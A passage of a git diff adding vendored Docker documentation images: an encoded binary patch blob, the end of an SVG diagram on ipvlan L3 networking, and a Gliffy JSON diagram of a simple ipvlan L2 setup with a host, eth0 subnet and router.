zn?UzwRe>!I+wm%NXK&$s=!@y=yA~n?K4GTE9nLwYxBrB5XVLJwnD6h{Z+ixERd5+Q0=_af_Z{pPmwPMNNVo= z^rA8x<0ts<5;8ZH)PoX%ne?R%?CbFx1>|Ft)?W5U-c9Y~dz5En8}m-QISYB@`4mY4 zW9t(O60{?YD}w}=snv7$F%1kM6P(L@8S?sxGEPWj|6uQpuv}y$PXwxizk|Yb$fH2j)Be<57<|=?) z7=toefVrv94SujOJ#Sg}yqaIWaY&Y??*6k$VyYbK8$AKc3jb%HTNw$Jb39d2mjxM@ z=d=|(v4Gd_E2cLLyx|}PT6r4s!8}pN-omkWg$xi>=)Dcr#<%ZPVn6f(SlFy~AHLY}=vShNZvs(>Pq`tkJX`n-95d-;rIln`$j| z`F``ctP$Lp%wj`vVKkAJffxJ%mR%E**F(o4QG1_%i2C!cB_M0?~vd%-A{K#TYrfuY6jxF_V7z1G^W^5 zTkPJ+SUdJ+k0#}#=jb4>-k?DVlkLplLG^rRCC{vgKNjI2DZP{(l3auvN}-9e*HX3E zY|ZkKA5d6X?|Deh9z~GQ@vQf=zMECF6tFx~Cf96uRL2Dyr0O3vRLGz;L)IUN?B zsq%We9EPv;iZn;9Zw!hiW zLd0HaeQ06T&$dp7q5FmKY2{BO06lC!TZ_Ri!ge{a&lmz7vGuv+$C zbi2UsYwN#=!F=TImu$daixwP`59?9biqDER2Aw-gPW8$CFsdmt!!B>PT5w#|C)r}_ z2;_M;_b&-|Y=^zpH(i*;wxxzVY?Or(o&kELz~rcAsz}r4i~dI~HKcqu_#{jl=wi@s6Il?Ufv3kf$F~w?T zXS0y$z?7NWvchoB$7{tI#Ro0uTOhEjvHzIfn}xQ_e1hz7neMVY0$xKoF~@7A9Z6Uv zjoS!uqN>pUm?DoL+82J7uGh=@Y{gT@)8l)~nTHM}BDEce8f#*F&?`G>1XN}0*gkzG zYab%K;%OL+gr5|jq|5GB`|;AA>;DplY!-@Wne1udl)5|VjAOAF3mu&HBp4$r3eWWu zGbk%;Co*CYpfqG1SCJ$%SuWA1I_p-mXg+p95oO_zl%Vn>hFagYp4ls4X0;sVKXL|A z{9GC$LuGOv_`^xGS2dPKM`&)S#B4DZIYEPdjfYgGbCPpwzemhxK>YV6e{jy>o1q zL2V0HFsggj|2)H%xFm=oCa1Iz;*$uC=POKh$r;s;^A6XJ@FF^4mVHxM=l$BmB7biWn!)HR#8Sen(!Q7)C~Ladc&k82OJh>_J?`mN<))eYFWR$j6;7-lu|#i}e*ftl`m>F$2P~R$ zHbl2-&`;>f%_-Duu(o5oF#7o8cgir@y3)Tbnrqf)bYz%&RCY36ECGEAl%NaqW=Z(< znTQ{!!A7)0jX3!%h`PeC$J1#=EG>{YX zf7soO!SffH(yI~zflPj>oQCo@t-lf&W_Z92tQ&ZvF0L$8@B-K(#Ts_P^WjPyv0c~- z^`vN@8u~lK9P`oGLASHezt;*GG*p)HXp+nMY@%4K|HK%qF7io#l|7}S_i&*S7nhUsDyo3PDMlyrL`O?WgU7i!5kUL%_&l&#LbkI zec7`)NhjISeE>!LAyZl@GiVcMQl9)C{q3fOo4?KQB5WK?^6s`oooI@N)o8jP^LKL3hoE+ zf2>c?7s=!J#GA#Bh7D}hhj=I)B!AA^aDSP$wKz9iHAqj~_0J=vviS8#3ET+ThUMYT zu+U#iGfvpVV2rZ+^kxq3EvtV|=*j&3jf|iG5|z7@YE1rCg~eLD;>eYV0^CU4A3-FcXaU4u!CqR>5Hl zd6qua$)>X~Mo4r8?m$#l&>lrw+J|9rK_+EaV|k5i+CJw&@{6QIb9UcoXT-@`LqPX= z@2LgNU;N_jmXq4$R9!QMHq>S?1x%Y5foxeE*GN+gB0nym~A+YzVc9 zU;Eua>iH+B215L3o(BG*_|J$>^?I<$Ih^ZSZyAk`Z(hG^$j>pG>YAN9X-AWrU2TtR zy?oms@-**ya<3-)vVM0v^AHg&4w5HV!?=1k$Qyxe-u6<-NFj9hq`v|6kt#j{|E{9_ z5mekudG@#+N6?+Y0vt8yEfdyhoD&9CN=ba8bfU>rH|CGFbFw$K|t&85e9*)7!M`NgD<&I4y=aaT$oI`wC|^b5mEAEkDqraetCI@ z-+g*2Xo<5lR;PBwMnSn1%pzOnWL-(ZL&Iw(wL0CAAk_YhgLL`<(V!oE+=6=Cq$Q8} zEmZ3n?!2)Zfrt;EIlv{tLhb<7ooMUl(oJEccYX#@?z4vb9Fl(L`x=o-4NV0TQlv)f z_fz9`q{Lo`NhyWhg{gMIl)3%f&fl6e49qG)NS)IJFh~T3otpcK(}T#uIuQPS51t-! z3wF8b-KGC1rEQC79hVisWmDd*0kueu3I~dvL7>}j>@O;qcE^#3$%N4j3VJzuZ$n;s z%ZjphD|29+=ZGDyJL3a?L$ek3D}8+cDS|6VooLE%{DIgSYfX3A?K=ZFltvHJTz~oD zG`L-6cY|6tTYckE3K)(x;F%tbyne&%i3pus>yR1YWX^;>1bc-AB_ESPd00(M2c#!h zQ?E1L?8xmUSjDM5IPe2HM<726F*gMwG8Cpx(*808RW#Hdz0fRYWP<)+7;AL_d=b@d zR>CkiFt3y5YSHER+rM5oUi+zEBt$$EFf_3^V&p5e{{1kZ^1)paM(iYxRPCknIPGuq zMVh#Ym|YQu<8SVpX-77=!cuiq7Q&L(v~EhF{tGM%Au_474&ZX`qAZqOO%j#sI#6crI0s6gy-PogU(m^H|vAak_JK;TY^q>7aM_&(BRmQCRV)If8U`d z(#A2~)7(WLxgH8sWhf&*$6UF%8e1J?M4emU)3>jx+4)9mDI(yRdj8!bzoeR^@}&&W z8{XG7N90j6?hg{g$l=u2#ZJW6C8)4)hT4P<7vM62l55*lO4Xwf+gJql&_Zow2(yrW zWXZ@x%QKs>ISd}n{-$$%X!Jktd{Zh)2hlLlbZgOH?E zBTgBxF*YAQ6uK;4Z)c8hb-)H%|2@s$Bde$U`^#=GHBGz zCI0QztR>93kKu{T-Xq#iY*_%N3aL7i5p0W`x3?zBe7W@e>AZ0m@{ftO<%^T3<3sxZ zH}`TDzmjQywsB6-R0+MQf~477*(IqvA@DkQ4)|zsR|RG4lCU62or*MyO^jX->0X$1T2hUkIC#y*XSfYWY%=xE zjuW;-ifb}QEQVGzFmGhmF`TVaiKE%G)T&KHVj%ohxT-9Bt0&u^O3Ej*luP(^yms7S zOlW>GUo&d)6`7&g(NG7lSN;LQ>-1?J9heLiODulF<0$vH2Ko!`w9$nZ4=$#O|eAS^G53K{9f1SzpXVlAG{i-8;oMhzcstd1R;i$4q{(g5JYjl;B-E>j5?8o_3$B@{1 z9Ghdc!YH9HjFl@-p35w5K-!5-2onQ;j8y_zS@m$uJA?m??<0ZPQkp~gBl^A5TDG?j z>`m11Dl_rq8sJN^*ik~>_F590nK<58GJl8t6r#GxLD3Kdbgo!5<6A>rU08s!-5mi+rT-1Lfs+3qYIZz-) zcm|_FsVog%T{Z9rP?%EyZ;qYAx9mh~XwX8t`)^^#NczBLsoWkv+A@FW)r~QmOz4k0 zqM-`k>IFKf*~FtfJ;Ql0!<3hRd7HzRMp?qd)03tDRo<+@63DwPP$yWrD}@S$~xxJ1zN+vzE@*%OxZUWp`mZKMoZiq^yniF^$sROaAF ztYBOQ5|TB~pOHCO$@^%13XwMcMp>b&PRk%T_JK;tLaJX7o0i>|ywKDkMc*;ZM<*H1 zmVBrLEaRm?0N;gc37I}}%kW6f;#;<{_DAj0I_bHHJ0#=&$2mVEPn#^?q!Q9ckfgX9 zP%3_Ur~@ifD|Mi#To~j{kJSLz*YfnV$c}jA#Ds2TB?CfxduQiO?diuVsJbd6F_5O{ zDVbIEmL2cxqCxdAp_T89V^8_gWXgj6X;(j%%sQVdXDd?&rdbwHK!s?wP{P+3vB=1w zo)2c)9&56^${ZZAUh?YU;Mm5&lAI)zv+MfCz%>VL5WGl><^OgrzsQX45!U>7m4B^U zr;mCfa+_~EI%T@<@@IN{`6B!zT%%-mJ{<6qlSt|Q=U-kmpvrVjv-N5ZKy8YhoSH4$ zZZo+v&13fqqkV06z#%gZXRMnIWcgy^!92-1k!~z2Zm6HOT1^AhO~CP;WQ~^xiB94Ur#J9jM?w@ilch`WKCRsASC>?DCfOaa`ep&u zN&XkzuJDr#I~N-Qe77>Ob?0Qx9avkA#8@Jsw4X~&kr3Jd2+civvp;#?43FNl zS9uG$1$mH#!-K`EWU{f&`wc*dDzcrjB=ktkE^|dimZ$K`6UB50%H80{eo0tsqLmEN zVAhq+mblRz+x520I3^1vI(e)c40TY9{Y!ODmq}-~m+~^{C@~j3`yP`XT}Lv*LrGMR z=FOzdYrIH;P^(>kh7>Ks>3+XGUreeR?9=*R1cn=Kg5t(3cqwX4F0mG998NYSJYNK~ zn!zPCoRaecBNzCtRzy8K-^sZR}uw}W|XmlCUlpf=V}11|M3J|&SfE` z*&G!j*JH{+vfw2?oAdT9(|YaOUYERd`gXohy>oi}$?I4Twz9=K@=OENOvUu+jtfs7rmT}Pfc`gbFw0>?M_G$M0*YhDffOcykB zSUeyro(Z$65FVG3E@<;H@a!vt7qH2B6hVoJ__2H<=3lf?<;0P2Q*ExWQ=C%dZ$FmO z@~j^uP4GIH>?F~Uz0p1|7v5S)rSqIg4&-itkqf`#ZdGNsZ~rk*p$MfSgoo{Mejn_19oQuxL+X}`WXEcb*=12X`_`VjL9XMyel0D{7 zU2&clVO>RzUkHoSrL;#GAnAdNu~H*ZU%~H^n&XFZpJLmpos&nv5$Ir?`ak;-z@v=W z11=VBE>@YanO6!+`;2-t;7omez=@^Rx&iLv8u(W4zd;>=rqZ)O;q}7tY#RowJqfzsqj+eb#%PvYZE* z@vCHaR4TT%LW)K${^f^GA{f6|vdnLIFD6Q@{;SIb{2JW{?nTNM_9~O^jW8ezEo~v- zq$ORU$H?>Gswm;)uhT*wJFL0U5brTnl4;poes2RxUQ*};>2o+swK-xXFGWH7|Yvj5j+X2zTGhw!g@4>Jt#ouOz@UE zZA;qQ2x6`(ZJ{R_=RhB9!5SE2|TG=Nssc!4(zW++6latl&==sNAlf znZp)cO|xFX&E++jiwoWu$E-B!@v_Pc^!dLSr_a3mvSzs0>t+_cDuXP^349L&*oG+_ zJx1Onro!7kZz7MdE4pcFqtjs+?VtDvB}*y<;Wxstw>x%}K7Y(yR5rRB&@;SN1eOy` z+o8s4q6>d&4ocSLT$QtVXjXrSBYQyT*C}5g-k&x{R}g)m0u)?-)POVAN?Pj*F-w;N zAGttpdZni+MLW(hq>_C4CvWRXTQ{B4IQZ};t zfCj7(Xt~%y8XVYU)JZDS?#t7JK=@^t_oIjpOq7f@w z;`p`C26J;3jE#E&7UUdR$$7tB83jcabI@LoQb~`h2GVOxeloh*Uh70KJZOXIt#Lsd zI}m>ETK!y7A{nYF)bd7VjkTqz=nlPo${!xY;d%~37Vem@V5w|a(c-lkrfA7IudAY( zo*8q*XzqbdOG67Z-QdmrO+FgYE+6(~5IRj9&IpNF;%Vo8f@JzD^SxT`%g-Fs`gkTh zutYedybNXt1dEgw01vV(#leHm=fo;8&#vHoz$YtPHo;Uf%p_*V5Z9dyg$JREiCNB5 zA zEO^oEVHdHWj%rt9em85-_mr>9sYRDkP5+LAM=L>>TlOCy!8dviR3$H@IkA%SqrL#4 z8vDx+B?7`b^L4S?8>SCWA6Gx3&(Fw~*VjrS@w?Z_*P354tSs&07D(zM z8aU4Z5@MaWMHDC_iNzTO4t#|f zl=2Iiop^~f*_>Buw0WVxpstXzI*OxmW(1Z436J9twion_%fJg(1_d5q*Yc#3d{nld z-I9UUN0XOkID$A?sM%`HC3X@!Sw`y8w&nA;ak)zInSarJ&Vje8IBPZYs>AHd2f`B= zzgX`{Yd@gzyU-?Nau}u8%*BLSlm}EDH)0J!7l1p4dcINO*vb@s`eqsBqg?7DNEt7> z-|kGbxW~A6t1fU%xyD^5y;|cHmcJ%ip?&$)kYP}u0JYJ{KV(A`DJ{pE3yt4 zM4ilIClq;rW6|wQE#coE#<94s;WMDS2+A^Ie~|u6gfpy#8Q{Vui5|Gf;a5yW;(sb@ zwJ`7nYOpMf6&8Hp5E6euxzALT1kdd?LTJ7IWO2o1ehJ{q>;*00~! z3yo>y5#01Qe-M!v&xyCJZ9(CfyG=xyPtJ`|YShOw){!epHxtNc$4`?y@Urm_H>1`z z^z2KF;odTo(a=dPUlNK}8CKQ*#viT#BTUVyDD4ETA%}MNa(NY9qcCRg2CW;%FzU9b z`Qf}OTbjCfLZN+%u^tu{=G3;{sQ86gE@*LW9yz1n91stI+B7??%F7(KXjah_0%M70w0uw~z4S2K#R-)Ts+r|rV(f=UjY4RAu;`m}7^e3b&LuKoUR{77?`+abD z(a%KcmnY=K_NEL{o^^kw&M~4H--%=mLBL8$yGMPB^4VqzN2Z|$y*ll<(b=jN;Ru9M zmT1ZMGzg!^QcR_#J85JW}m%S{w4tpau3Bh+2cu1 zyLR~C>qvZd-@Jw`!eB+Z!73nlPyb?=J~3Y&1TDbY=@ndKmcoIgmLr?LjVeuJGP>qp zs`eGyyeE0mw<*W*jMK4zfQ(S3AU1)>G>D&MB!ZN&-1BGhLmA~6uRkr)AdrRPXLs1- zb8xym-7@HLbi!xlaHq6#B~DfhD$Cax~r!r@4H&H%%O0YP-No3YXxj;+naW{ zJmtSD9W(Q7GuA6dspe?Pn*J#0wR0Jh7Fj=v_sW1%MOypm+r?<;jdLDqFs({EGc!~! z9N5)K>F)8ez&r)?JrSA#@&a2l^f(pyK$rGuny#z%6zK9)ewBy_?DBrd(?)hZNt%J= zz^^4WD)MkHtAoc~V;BT2i7sg9zOCD6Ez+gvUZTPklb56&U6qU*L(2-}ulpIZ!XS^rYQ83bmQzLzP!)w)4f*^(&}n7_KG z03c8?QdQc;z!FqMf2)MxO_M4in9ZT-L(0j;QeeL})>bzB38xLHt%at5)dlaG7e+s( z>AXiz&-FY7f0c19!qsLZwaC(>iL)VU#OtIAJNmRAO#SSwpM>!E5l>=t6>ezI*ML}s zZGOF;(bK&!1R%=ZOpd@P7(jOLI{NDtx`ENh<`35g$@+)bZq_-uOAoyhN`5}WikFcT zhnc0;p#I2~1wrr913&d&GE}WVc8(Sw>wqUSu4gG0|C(Yn;@*TI;9F*{pW!DvA%#|E z8Cz9z+zhlfA_}_0@7SnCg6xF!+qB3n$ypPypaL;e|{zyvFx*a$Kb>1g5n-WDa`yB;gL<7 z6StQ}cPUw*DSsrE=m*qW(7p)iGRJU+(GMRLN!Nwj_g)Zh?JV$VJ}p03ACgN*oj7J5 zBYojC@=|y}3_cvQoErfwactWc6*g^*giL3!&b)#Q!XhyCVA4^qeSq$t4I)^sKJ1;1 zC4N@1Xd?e*ME_1d`*#l+b`wtCo&gJ(q8M^^E|P=MH4n84Fb*u5ed}b6=0U(;EDbp) z^P`+cR+Zf{k*0uiHnPgHni7>G$q=^^rXT+~H#JT{Q~qC{TlwCzWuQgW-8S4M*NTTEr zaT`Y=a!jhHTVn1OGkuXyR_IUWRF(nnuiNskz$zj!Bs7!M(?6Q0`a}>Y!4N}@9hg@Q zWPxXd#T}1_x1s4b?k*Y`mTD=H)T3V;MdCg1a;MACU;odjaHt{IfJK<$H}$H|D8k}3 zA-`O%5$BH+y@R*kl1ZLwvdS17mdTd)IfZ0;dIg{m7p*hu4bPiL?@a;_>aSnxDn?pr z5|IVfBMZz(Pn_o!Z10Wgm_8SLU6S~ww0m>ET0TG}Di|*Es|LI)lR^JPh%+88%5lX? zCL3k%mf}<#N1R!bUGCpgo}M;Vi@yjb6qH%dLW712_cHCbSK19Cu>eI+erErHh-O-H zG^XT_)Pj|m=zE=gEsZy>Kp6#==aSJ3aFyH%jm-~nl@tkt*#ljYXjmw=k@SR04BgTU zy&ZggKYC^cIr-hxZ$_A|^OyBi>GAd2ThZXS$6yAwshKJEcH~NWWYl$}*RZEF%p!4O z6k|tsWrOX#mFZn4DbHooDZkrb00sQ%{f~wox^)j(PRYv0yB&kX3Fk0)l2z=?#x*m~FXEGfqXoN?@|qa^2Ng$%=Rhy1@K2>B#_6Sf~uG zv?Wpzy38r~U4*S;-jD#v$nbg~)Ds z-V1jS38MSa$3U!PWOv>AG!KB-3!SVD2~@J&Hm$GJ606ezHEt5R!^dP*Sue2R5LlI2 z1-LyCs3tiKBP~1~b7XB;$r2_FqN=cl0N%;V9|aaY?B|!eYOM0-ZbpIf8n<-@TIxp9 z^7c-33NeU<43x4ZFdk1!;pIA|A}N-~J>BmGIIg$RP_gtk#`@VJN5h?>C0I{^b3N~1 zL}T7Y_*AY`dvMB{*^gQSaJ{(MhhL$y<$292A*UFozBZM3~(;sZPVTPX` z;ztmP1_t8Lp6k=iJq^y+;yra(H3?$I`wt!P&D$Rqaw9m~zrI7yN>tnfofCm)94zL< z{8-Whkl46_vzx--yXbF#KUFaL+AsF%slVT0W>T-qm6{TrH%TU1R#Dz#&sIqI^kc9q zw;ri=0GpQBmuLj!F)rno96#NBMH7K1mIV&TBdM=`PwA8(&&;y*v!;cQ2^g}>|7IK& z57obBP%K%COCx4G=d{oLt^#C||MTFtmskAJG=zLftXu-gq5R2!)-dyNzsq;AhpJ*K ztAu{Ph1kAg!;d3$9)mK%N>LoaJ6GW~tMF$LmgWBjvKBQoRUp>PGL|Yg#ahkBU^EbI zCN=B-|3LY1ADW^>m0j6H>nhiv@Dh%uM4VmO^uIyUY7_l5?Qaz;Qx~5a&@|NyX?l; zPWS{aMqby)>DCcpg25VM8%gPd{ z`i70!YNM^ddIOqTtT0OkHEjp@<;h0ZO4uM;keT|rp-APLsivz)9fl6|zTY{|<3`r2 zp2t(8iifGA!(nH(*QDE|&z9Gt;4Rep%U|4mZ@RU#qedH3g)#NR|G8wRR*hT!yYb=O zXDa#S{z1Os6_P4%Hl<$e#142Zt zoR|#2%+LVsMg}7bni>hQ{pP8=FrVA45RMiq8$yvnSL*tL1$I(QfS%M(yfP@iS1AWP z2lIKKPNAM=3+>*#(-?K6gtfuQnxk1THy7?{9n%Sd!kIXmuYZMOhTWt37B?yU#B7r? z=G^ACYZRx!PSFSS6NzhE# z@p9cd3|MUYhbKhOR>}1xDRPICg~677VMF>KM{yOwwG8jd7oE(Rq;LFL?168HD!j6u z)d2J5o;$D6xnA0_@ZFBP_J%DqW3f8XN|uy@{jn%Mm#`VpCJ@E4D1=!QIe1d?Yy(Xc z^!Zww#2ur07i<<=5|fSP_Bw?qoU{lGBg;fMyhdql2A=R4Z6;84N?>%8R+{`C(sL!izbn-3vm$vn0B+f&fsN`3e9f{dyAlRtYQ)7R&;f zo*r*1v&TM6$SXV;|8_Its9kt?6T)TK)NxUS7*1tdO>{+`#NYijV*`DvbsCLSv@;ES zH;(!Dz+Rc`LkCBnZ4O6IIJ}Ij(-iK0oG7sxy3yt99q~GzzL(svlWZs2^>>VrPdQPH zpw8bvR!qC&;aIhf*u`*>;K?rINRW6-(G<<#iDN{W6j1z+D--bGVOxfI!Jd?*GG@HGRC=q%kZm^;YZa#SvWfyxZylM?9sygkg0xe-)JN$i~3j4=>q5^3lW_ zeKCy?#k?>FCGd`ycvAk$(@B1A?dg~tl1$5R1!P?();c;9SYAsr{G;+cQTl-icPs#uf4>R)!KaO&u-5@<9+Qyv2 zgSmcVgp&RhF-Lx9Fr;BoSG%pcxS#E*M)5{$Z{6oiIA)0^`2@ahw9T$?)zep6<8@sN znFvBk8>g@0XERfv;dVO*95Bl7SXK=9|5Ku%R?vlcUbP+!ABR6X`x9tPsM28o9NPb&|y<*Vh|BxTP&W`MwosXwnC$;YCxBRwUUIQMF@s0~s zhMr9cE`1N-j~Lsn*x)W&h%1}OK~Y+-(!IdT4LCYMTgSTKNuLwG#SnV9B^0$o^I-&d zEB_4%Tdej+$XUsazv3nMegSFWg}`zr!-Z`38hLMM_dx=fr$EHXl+Cl~p&_DwluAB{H~tZkx<-hN;&4CCl5*aJQc2qi7WNiE_EbCV{|Mw%gm zU7(B4SKd`!FkvTDi?}!5)_zC(qda#I8p9I+@`^e~n(dK-F%=;)_Ij+JIAnVYBo#AE zNAEvV=szD{AkJY6Lx)#1qa`-2sL7jZM=%W?9RDQ>&TH~rjkqF_X4+h>?2S;6q0mfD z^sL&_!jNx%GMnaAQ=w%3-sXl8aH5+3HF9b5pfq z`C~s?RAg5YSprv)0CvY*>~1o@y6xaU!E9r=hAU!;bt7L&#uJloz7o;bTLQ@hOT*7iQmj=<}S* z8JH^4bM=LI55#zrwlHaIVwK?_g})Rp;Gqjc}(SeJz3?Xs4&({VfvzRl&J?ISrJ82m~9yD z>~4NbSo$qEyF5}p|!AiOZ%uKV{J9q|X2bSTwfkBzp zq@9pkm!7bCcfIRk{sSE0^%U1zxsv*Ssptc7=_tObJsm;QyfBLU=(xs`m9BukN|8_5 zDia)iupL;TlV(JjUiPiS7yqG^P9VU>Z)u3~nGf zJfmNSh;oc(4-Dc>)wXKuuyG=r%n$~OT>B|)nB1$>&&LFm%^LaVf6XBk55vOp;n-8V z>~ICg?cJg8EbAoN-fZZs=`1NYH3}ehhPQ!Ln*2A@%HG&rjQc`)(xNoq7iQoiaZ+Si zGzvHwmCjc<&A1_3Yk-f;*XT~KcR)C3pG75LYWD6m0WWRX51~AhcsY-c zMZP`DQqzpvRmFOpWF~^ljzWxa*@(`&NY$)-{hv)RI(nzPk-Mo451`P@ZA#P|fP&@t z)DqqQR_11mtPm=ESM~X`jTKE3+#*^Gp#Y^+09xTH7FK_C;2m19OdMvPe^Yl;wp5*t!ch-YkD&-ho1 zoI$$7#aIZ&^zJ6!%H*Mli>CcaOPqULQHg^k@gW?ykRae@*v7Pgex5B&-!puyro;E5 zY&Jon-MYCOT?u`(BMS?~j|v=NWq~uFdkSaO%D=@dMP3g^v}IxWy7g)Ic^Y6xu13EJ zQe!HY>%j;7gWQ(FocLV?%oPxptEmq0?EvU$c^&wU+C?xIm$A~h7kXzIycIepNR_u_ zgWyon(Q5ODq@muYEd-&I^w)hdKjn+uAzpj8DyF@x(J~4M9iIpkp0n6rl&Y8Yx*8SSX#4b&t6MtY-+vi9=BG05!BwEc7Z~- zwyE}!zIs(w>9rhNTYsThyfMG|@#yNaw|o)$E^=ru~97`Wc|aHmuv!iaz7SWsgge3Egn&R07)Tuf1jRb-a#<{^6)!Iko7oP}F* z5qbk6nqWmGVs}aGMvZ0X*-MRl*X$|8@IltFJ|Pi=u_WzBTutdTTz@j6Px<> zRukMQ8@8y;1k?ixEt2%P0fzVT^6{HB+G;v)8DLlftHq^IZ5iWC8_#_|>+)Xd>fMlc z;(Cqf=lgW3+Cz`tctK_Z>NE{H>Jp|pMqk|xi@gdByYsc&=n}0Z+(%R2(W`~Lt3#2* zdO)S$L#m*I&Vt&*3g+r9qUoeTgFTe{V@Mw!^`IMhn)SsvQR~5k?4`*B+$kH@C`@oT z^?*W)WPNUc;oVkIw{?*Th9yufNTJ#;w8;{Et#hP)hb|j48~$`KLQ{uLKA1PNdX#k< z(+KCy2%UF{`eT9G$Q8o_{c?l4O<%FsCHO0FZD;3$pxX@V^{hd(@nW=ppxbSrX-xTP zf;x2L;6X(&575D<-fqX{Yio&&E(^7;I6r*q*2vQ=0a1JgYZq|GDH~b@6C7|2D6~lU z+yKKnr(q)l%wK&q;8Lj836t@i+I{)(hYKStSUg|)ZJ|`qi&y<|X*}8{jd!DS15KBh zB^$@01$&gwg+zmiwP3$wtvXkvvkQ}nV$easpaxc=p}#dNmRc{}{P3w;qjt?w3{is9 z47hpG_4^#1EeuBTuswLsYekDWh|x0=UyQqzEP?oci}16k0UxbHl3h z?pe+V!|JPnl*A{(m@!7^EVqp0py&{)@-kH#;Zb?Z(@DN2vu}y6{$!TAk(gyT^Og#B z`wr8ag5jhwiW#8?s6&y>o^3Kmu@@a=7StDkwX+j?01LIg5PA627^7Ep5=@%tiBpZNqnCfvqrQ)xzWwjG|=Qqn)&cF$z9^S{JzWk zygtOc>)O{ulgSEIT!PtXW3x-|6&0188+vC6-}sqN!(1=wP-M3dZT;KB^3g#8)WF)= zE*kxj=p)0_dYh7mPmPhMIW}#g^0gBeSEUQMQ#P~+CM2BtIR}Ln4WAoUop;YhMi^FK z4WuLrW2V5#Q9LPo<;s`*X(l$q#a?lxckao*-sZ`F`1gxXUL*vn|I-_`hu2&{L?`X- z;)?wF-w_kJIuuFtP2CKb;{Y8rKn<*o&lvkFyJPAOG06{~8Y5q`n1QJ19_!f*I$PXn z8(P$60_wLN6k0TVZdi5RErEhF!?60Q#idZKjM*dF-HnZnJ^Kk!-{DockerHostUnlessnotifiedaboutthecontainernetworks,thephysicalnetworkdoesnothavearoutetotheirsubnetsWhohas10.16.20.0/24?Whohas10.1.20.0/24?ContainerscanbeondifferentsubnetsandreacheachotherIpvlanL3ModeEth0192.168.50.10/24ParentinterfaceactsasaRouterAllcontainerscanpingeachotherarouterifwithouttheysharetheparentinterface (sameexampleeth0)Container(s)Eth010.1.20.x/24Container(s)Eth0172.16.20.x/24PhysicalNetwork \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.gliffy b/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.gliffy new file mode 100644 index 0000000000..41b0475dfa --- /dev/null +++ b/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.gliffy @@ -0,0 +1 @@ +{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#ffffff","width":323,"height":292,"nodeIndex":211,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":null,"viewportType":"default","fitBB":{"min":{"x":16,"y":21.51999694824218},"max":{"x":323,"y":291.5}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":241.0,"y":36.0,"rotation":0.0,"id":199,"width":73.00000000000003,"height":40.150000000000006,"uid":"com.gliffy.shape.network.network_v4.business.router","order":41,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.network.network_v4.business.router","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#3966A0","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":85.0,"y":50.0,"rotation":0.0,"id":150,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":37,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#999999","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[3.1159999999999997,6.359996948242184],[85.55799999999999,6.359996948242184],[85.55799999999999,62.0],[84.0,62.0]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":22.803646598905374,"y":21.51999694824218,"rotation":0.0,"id":134,"width":64.31235340109463,"height":90.0,"uid":"com.gliffy.shape.cisco.cisco_v1.servers.standard_host","order":43,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.servers.standard_host","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#3d85c6","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":87.0,"y":24.199996948242188,"rotation":0.0,"id":187,"width":105.0,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":39,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

eth0 192.168.1.0/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":147.0,"y":50.0,"rotation":0.0,"id":196,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":40,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":199,"py":0.5,"px":0.0}}},"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#999999","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-82.00001598011289,6.075000000000003],[94.0,6.075000000000003]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":220.0,"y":79.19999694824219,"rotation":0.0,"id":207,"width":105.0,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":42,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Network Router

192.168.1.1/24

